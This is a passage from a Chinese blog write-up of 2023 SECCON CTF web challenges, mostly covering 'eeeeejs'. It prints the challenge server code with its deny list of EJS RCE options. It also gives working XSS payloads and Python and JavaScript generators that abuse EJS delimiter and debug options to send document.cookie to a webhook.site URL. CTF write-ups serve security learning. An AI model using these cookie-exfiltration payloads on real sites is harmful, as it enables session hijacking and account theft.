<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">name</span>=<span class="string">body</span> <span class="attr">srcdoc</span>=<span class="string">&quot;&lt;a id=togglePopover href=a:fetch(`https://webhook.site/7d1a593d-f1da-4f67-beba-023fe1ccece1?q=$&#123;document.cookie&#125;`)&gt;&lt;/a&gt;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>将会生成</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">id</span>=<span class="string">&quot;togglePopover&quot;</span> <span class="attr">href</span>=<span class="string">&quot;a:fetch(`https://webhook.site/7d1a593d-f1da-4f67-beba-023fe1ccece1?q=$&#123;document.cookie&#125;`)&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>之后，就会产生执行</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">setInterval</span>(<span class="string">&quot;a:fetch(`https://webhook.site/7d1a593d-f1da-4f67-beba-023fe1ccece1?q=$&#123;document.cookie&#125;`)&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>注意，本地测试的时候，传给bot的时候需要将127.0.0.1改成web，不然bot里面设置了cookie作用域</p>
<h3 id="eeeeejs"><a href="#eeeeejs" class="headerlink" title="eeeeejs"></a>eeeeejs</h3><p>这题主要就在于设置选项，需要调试</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&quot;express&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> &#123; xss &#125; = <span class="built_in">require</span>(<span class="string">&quot;express-xss-sanitizer&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> &#123; execFile &#125; = <span class="built_in">require</span>(<span class="string">&quot;node:child_process&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> util = <span class="built_in">require</span>(<span class="string">&quot;node:util&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>();</span><br><span class="line"><span class="keyword">const</span> <span class="variable constant_">PORT</span> = <span class="number">3000</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Mitigation 1:</span></span><br><span class="line">app.<span class="title function_">use</span>(<span class="title function_">xss</span>());</span><br><span class="line"></span><br><span class="line"><span class="comment">// Mitigation 2:</span></span><br><span class="line">app.<span class="title function_">use</span>(<span class="function">(<span class="params">req, res, next</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="comment">// A protection for RCE</span></span><br><span class="line">  <span class="comment">// FYI: https://github.com/mde/ejs/issues/735</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">const</span> evils = [</span><br><span class="line">    <span class="string">&quot;outputFunctionName&quot;</span>,</span><br><span class="line">    <span class="string">&quot;escapeFunction&quot;</span>,</span><br><span class="line">    <span class="string">&quot;localsName&quot;</span>,</span><br><span class="line">    <span class="string">&quot;destructuredLocals&quot;</span>,</span><br><span class="line">    <span class="string">&quot;escape&quot;</span>,</span><br><span class="line">  ];</span><br><span class="line"></span><br><span class="line">  <span class="keyword">const</span> data = <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(req.<span class="property">query</span>);</span><br><span class="line">  <span class="keyword">if</span> (evils.<span class="title function_">find</span>(<span class="function">(<span class="params">evil</span>) =&gt;</span> data.<span class="title function_">includes</span>(evil))) &#123;</span><br><span class="line">    res.<span class="title function_">status</span>(<span class="number">400</span>).<span class="title function_">send</span>(<span class="string">&quot;hacker?&quot;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="title function_">next</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Mitigation 3:</span></span><br><span class="line">app.<span class="title function_">use</span>(<span class="function">(<span class="params">req, res, next</span>) =&gt;</span> &#123;</span><br><span class="line">  res.<span class="title function_">set</span>(<span class="string">&quot;Content-Security-Policy&quot;</span>, <span class="string">&quot;default-src &#x27;self&#x27;&quot;</span>);</span><br><span class="line">  <span class="title function_">next</span>();</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/&quot;</span>, <span class="keyword">async</span> (req, res) =&gt; &#123;</span><br><span class="line">  req.<span class="property">query</span>.<span class="property">filename</span> ??= <span class="string">&quot;index.ejs&quot;</span>;</span><br><span class="line">  req.<span class="property">query</span>.<span class="property">name</span> ??= <span class="string">&quot;ejs&quot;</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">const</span> proc = <span class="keyword">await</span> util</span><br><span class="line">    .<span class="title function_">promisify</span>(execFile)(</span><br><span class="line">      <span class="string">&quot;node&quot;</span>,</span><br><span class="line">      [</span><br><span class="line">        <span class="comment">// Mitigation 4:</span></span><br><span class="line">        <span class="string">&quot;--experimental-permission&quot;</span>,</span><br><span class="line">        <span class="string">`--allow-fs-read=<span class="subst">$&#123;__dirname&#125;</span>/src`</span>,</span><br><span class="line"></span><br><span class="line">        <span class="string">&quot;render.dist.js&quot;</span>,</span><br><span class="line">        <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(req.<span class="property">query</span>),</span><br><span class="line">      ],</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="attr">timeout</span>: <span class="number">2000</span>,</span><br><span class="line">        <span class="attr">cwd</span>: <span class="string">`<span class="subst">$&#123;__dirname&#125;</span>/src`</span>,</span><br><span class="line">      &#125;</span><br><span class="line">    )</span><br><span class="line">    .<span class="title function_">catch</span>(<span class="function">(<span class="params">e</span>) =&gt;</span> e);</span><br><span class="line"></span><br><span class="line">  res.<span class="title function_">type</span>(<span class="string">&quot;html&quot;</span>).<span class="title function_">send</span>(proc.<span class="property">killed</span> ? <span class="string">&quot;Timeout&quot;</span> : proc.<span class="property">stdout</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(<span class="variable constant_">PORT</span>);</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>一共设置了4层waf</p>
<p>waf1，编码html</p>
<p>waf2，禁止设置ejs的RCE选项</p>
<p>waf3，CSP同源(其实上就是防止直接远程加载而已)</p>
<p>waf4，只会允许通过渲染src路径下面的render.dist.js文件</p>
<p>(可以通过<code>npm run bundle</code>，生成render.dist.js)</p>
<p>那么index.ejs接受filename以及quey两个参数，根据waf4，filename=render.dist.js，waf2禁止了RCE，本身需要XSS，所以需要寻找新的设置选项</p>
<p>那么实际上根据网上的wp，比较重要的就在于ejs的 options <code>openDelimiter</code>、<code>closeDelimiter</code> 以及 <code>delimiter</code></p>
<ul>
<li><code>delimiter</code>用于内部分隔符的字符，默认为“%”</li>
<li><code>openDelimiter</code>用于打开分隔符的字符，默认为“&lt;”</li>
<li><code>closeDelimiter</code>用于结束分隔符的字符，默认为“&gt;”</li>
</ul>
<p>所以如果设置不一样的间隔符，将会产生不一样的结果，同时如果将debug设置为真的时候，会输出src</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (opts.<span class="property">debug</span>) &#123;</span><br><span class="line">     <span class="variable language_">console</span>.<span class="title function_">log</span>(src);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后通过设置src，以及开始结束符号，就可以成功绕过waf1</p>
<p>实际上本质还是调试，寻找的问题</p>
<p>最后，贴一下payload</p>
<p>payload1：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> urllib.parse</span><br><span class="line"></span><br><span class="line">webhook_url = <span class="string">&#x27;https://webhook.site/cae461f6-3930-48bf-9cfd-d47cba2d0ff5&#x27;</span></span><br><span class="line"></span><br><span class="line">script_payload = <span class="string">f&quot;window.location.href=`<span class="subst">&#123;webhook_url&#125;</span>?`+document.cookie&quot;</span></span><br><span class="line">script_payload = urllib.parse.quote_plus(script_payload)</span><br><span class="line"></span><br><span class="line">url = <span class="string">f&quot;/?filename=render.dist.js&amp;src=<span class="subst">&#123;script_payload&#125;</span>&amp;settings[view options][delimiter]=%20&amp;settings[view options][openDelimiter]=(opts.debug)&amp;settings[view%20options][closeDelimiter]=%20%20%20%20%20%20%20var%20returnedFn%20=&quot;</span></span><br><span class="line">url = url.replace(<span class="string">&quot;[&quot;</span>, <span class="string">&quot;%5B&quot;</span>)</span><br><span class="line">url = url.replace(<span class="string">&quot;]&quot;</span>, <span class="string">&quot;%5D&quot;</span>)</span><br><span class="line"></span><br><span class="line">xss_payload = <span class="string">f&quot;&lt;script src=&#x27;<span class="subst">&#123;url&#125;</span>&#x27;&gt;&lt;/script&gt;&quot;</span></span><br><span class="line">xss_payload = urllib.parse.quote_plus(xss_payload)</span><br><span class="line"></span><br><span class="line">final = <span class="string">f&quot;http://web:3000/?filename=render.dist.js&amp;src[<span class="subst">&#123;xss_payload&#125;</span>]=UNESCAPED&amp;settings[view options][delimiter]=%20&amp;settings[view%20options][openDelimiter]=(opts.debug)&amp;settings[view%20options][closeDelimiter]=%20%20%20%20%20%20%20var%20returnedFn%20=&quot;</span></span><br><span class="line"><span class="built_in">print</span>(final)</span><br></pre></td></tr></table></figure>
<p>decode一下，然后解释一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://web:3000/?filename=render.dist.js&amp;src[&lt;script+src=&#x27;/?filename=render.dist.js&amp;src=window.location.href=`https://webhook.site/7d1a593d-f1da-4f67-beba-023fe1ccece1?`+document.cookie&amp;settings[view+options][delimiter]= &amp;settings[view+options][openDelimiter]=(opts.debug)&amp;settings[view options][closeDelimiter]=       var returnedFn =&#x27;&gt;&lt;/script&gt;]=xss&amp;settings[view options][delimiter]= &amp;settings[view options][openDelimiter]=(opts.debug)&amp;settings[view options][closeDelimiter]=       var returnedFn =</span><br></pre></td></tr></table></figure>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">settings[view options][delimiter]= &amp;settings[view options][openDelimiter]=(opts.debug)&amp;settings[view options][closeDelimiter]=       var returnedFn =</span><br></pre></td></tr></table></figure>
<p>这个就是设置符号，基本上跟一下代码就知道了，会造成截断问题，具体分析可以看一下</p>
<p><a target="_blank" rel="noopener" href="https://blog.huli.tw/2023/09/23/hitcon-seccon-ctf-2023-writeup/#eeeeejs-12-solves">https://blog.huli.tw/2023/09/23/hitcon-seccon-ctf-2023-writeup/#eeeeejs-12-solves</a></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">src[&lt;script+src=&#x27;/?filename=render.dist.js&amp;src=window.location.href=`https://webhook.site/7d1a593d-f1da-4f67-beba-023fe1ccece1?`+document.cookie&amp;settings[view+options][delimiter]= &amp;settings[view+options][openDelimiter]=(opts.debug)&amp;settings[view options][closeDelimiter]=       var returnedFn =&#x27;&gt;<span class="tag">&lt;/<span class="name">script</span>&gt;</span>]=xss</span><br></pre></td></tr></table></figure>
<p>这里主要是放置payload，绕过waf2同源</p>
<p>同时需要赋值，赋值什么不重要，需要的是使得src成为键值对，符合赋值条件就行，因为将会包含<code>sanitizedFilename</code>，而且，<code>var sanitizedFilename = opts.filename ? JSON.stringify(opts.filename) : &quot;undefined&quot;;</code></p>
<p><a target="_blank" rel="noopener" href="https://github.com/mde/ejs/blob/v3.1.9/lib/ejs.js#L625">https://github.com/mde/ejs/blob/v3.1.9/lib/ejs.js#L625</a></p>
<p>payload2:</p>
<p><a target="_blank" rel="noopener" href="https://brycec.me/posts/corctf_2022_challenges#simplewaf">https://brycec.me/posts/corctf_2022_challenges#simplewaf</a></p>
<p>实际上ejs.renderFile<code>内部使用</code>fs.readFileSync</p>
<p>所以根据上面的原理，还是可以构造出另外一种不同的payload</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> <span class="variable constant_">ATTACKER_BASE_URL</span> =</span><br><span class="line">  <span class="string">&quot;https://webhook.site/7d1a593d-f1da-4f67-beba-023fe1ccece1&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> jsPayload = <span class="string">`location = &quot;<span class="subst">$&#123;ATTACKER_BASE_URL&#125;</span>?&quot; + document.cookie`</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> srcUrl = <span class="string">`/?<span class="subst">$&#123;<span class="keyword">new</span> URLSearchParams(&#123;</span></span></span><br><span class="line"><span class="subst"><span class="string">  filename: <span class="string">&quot;render.dist.js&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  <span class="string">&quot;settings[view options][openDelimiter]&quot;</span>: <span class="string">&quot;__require() &#123;\n&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  <span class="string">&quot;settings[view options][closeDelimiter]&quot;</span>: <span class="string">&quot;||&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  <span class="string">&quot;settings[view options][delimiter][]&quot;</span>: <span class="string">&quot;&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  mod: jsPayload,</span></span></span><br><span class="line"><span class="subst"><span class="string">&#125;)&#125;</span>`</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> evilUrl = <span class="string">`http://web:3000?<span class="subst">$&#123;<span class="keyword">new</span> URLSearchParams(&#123;</span></span></span><br><span class="line"><span class="subst"><span class="string">  <span class="string">&quot;filename[href]&quot;</span>: <span class="string">&quot;x&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  <span class="string">&quot;filename[origin]&quot;</span>: <span class="string">&quot;x&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  <span class="string">&quot;filename[protocol]&quot;</span>: <span class="string">&quot;file:&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  <span class="string">&quot;filename[hostname]&quot;</span>: <span class="string">&quot;&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  <span class="string">&quot;filename[pathname]&quot;</span>: <span class="string">&quot;index.ejs&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  [<span class="string">`filename[&lt;script src=<span class="subst">$&#123;srcUrl&#125;</span>&gt;&lt;/script&gt;]`</span>]: <span class="string">&quot;&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">  <span class="string">&quot;settings[view options][debug]&quot;</span>: <span class="string">&quot;1&quot;</span>,</span></span></span><br><span class="line"><span class="subst"><span class="string">&#125;)&#125;</span>`</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(evilUrl);</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>所以这个payload直接对生成的文件进行操作了，这需要对ejs的框架非常了解(暂时这样吧)</p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>diffany
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://gudiffany.github.io/2023/09/18/16-34-28/" title="2023SECCONCTF">https://gudiffany.github.io/2023/09/18/16-34-28/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/09/12/22-40-36/" rel="prev" title="2023waconCTF">
                  <i class="fa fa-chevron-left"></i> 2023waconCTF
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/10/02/17-31-22/" rel="next" title="2023mapleCTF">
                  2023mapleCTF <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">diffany</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://unpkg.com/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://unpkg.com/@next-theme/pjax@0.6.0/pjax.min.js" integrity="sha256-vxLn1tSKWD4dqbMRyv940UYw4sXgMtYcK6reefzZrao=" crossorigin="anonymous"></script>


  <script src="[object Object]"></script>
  <script src="/%5Bobject%20Object%5D"></script>
  <script src="/%5Bobject%20Object%5D"></script>


<script>
var options = {
  bottom: '64px', // default: '32px'
  right: 'unset', // default: '32px'
  left: '32px', // default: 'unset'
  time: '0.5s', // default: '0.3s'
  mixColor: '#fff', // default: '#fff'
  backgroundColor: '#fff',  // default: '#fff'
  buttonColorDark: '#100f2c',  // default: '#100f2c'
  buttonColorLight: '#fff', // default: '#fff'
  saveInCookies: true, // default: true,
  label: '🌓', // default: ''
  autoMatchOsTheme: true // default: true
}
const darkmode = new Darkmode(options);
darkmode.showWidget();
</script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script><script src="/js/pjax.js"></script>

  <script src="https://unpkg.com/hexo-generator-searchdb@1.4.1/dist/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script data-pjax async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>


  <script class="next-config" data-name="leancloud_visitors" type="application/json">{"enable":true,"app_id":"ImshWy4c6kiRqFukNXuAeVYt-gzGzoHsz","app_key":"I15dpBmlxhPPxNgS0pn9Fer5","server_url":null,"security":false}</script>
  <script src="/js/third-party/statistics/lean-analytics.js"></script>


  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"all","js":{"url":"https://unpkg.com/mathjax@3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>



</body>
</html>
